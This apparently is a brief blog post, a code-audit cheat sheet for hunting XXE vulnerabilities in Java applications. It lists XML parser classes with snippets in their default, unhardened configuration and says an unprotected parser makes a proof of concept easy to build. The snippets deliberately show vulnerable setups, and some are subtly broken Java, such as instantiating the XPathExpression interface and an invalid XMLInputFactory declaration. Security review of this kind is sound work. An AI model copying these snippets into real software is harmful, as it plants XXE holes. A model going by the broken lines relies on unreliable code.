标签归档:Open Source

How to Hunt for XXE Vulnerability for Applications Built by Java

Reference

Keywords

DocumentBuilderFactory

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder safebuilder = dbf.newDocumentBuilder();

XPathExpression

DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();			
DocumentBuilder builder = df.newDocumentBuilder();
String result = new XPathExpression().evaluate( builder.parse(new ByteArrayInputStream(xml.getBytes())) );

SAXParserFactory / Unmarshaller

SAXParserFactory spf = SAXParserFactory.newInstance();
Source xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(), new InputSource(new StringReader(xml)));
JAXBContext jc = JAXBContext.newInstance(Object.class);
Unmarshaller um = jc.createUnmarshaller();
um.unmarshal(xmlSource);

XMLInputFactory

XMLInputFactory xif = XMLInputFactory.newFactory();
XMLInputFactory xif.setProperty(XMLInputFactory.IS_NAMESPACE_AWARE, true);

TransformerFactory

TransformerFactory tf = TransformerFactory.newInstance();

Validator

SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema();
Validator validator = schema.newValidator();

SchemaFactory

SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema(Source);

SAXTransformerFactory

SAXTransformerFactory sf = SAXTransformerFactory.newInstance();
sf.newXMLFilter(Source);

XMLReader

XMLReader reader = XMLReaderFactory.createXMLReader();

SAXReader

SAXBuilder

SAXBuilder builder = new SAXBuilder();
Document doc = builder.build(new File(fileName));

Highlight

If you find any keywords listed above and no any properties set to prevent again XXE, it could exist XXE Vulnerability potentially. You just need to check the invocation chain, you may be able to create a POC very easily.

Acknowledgement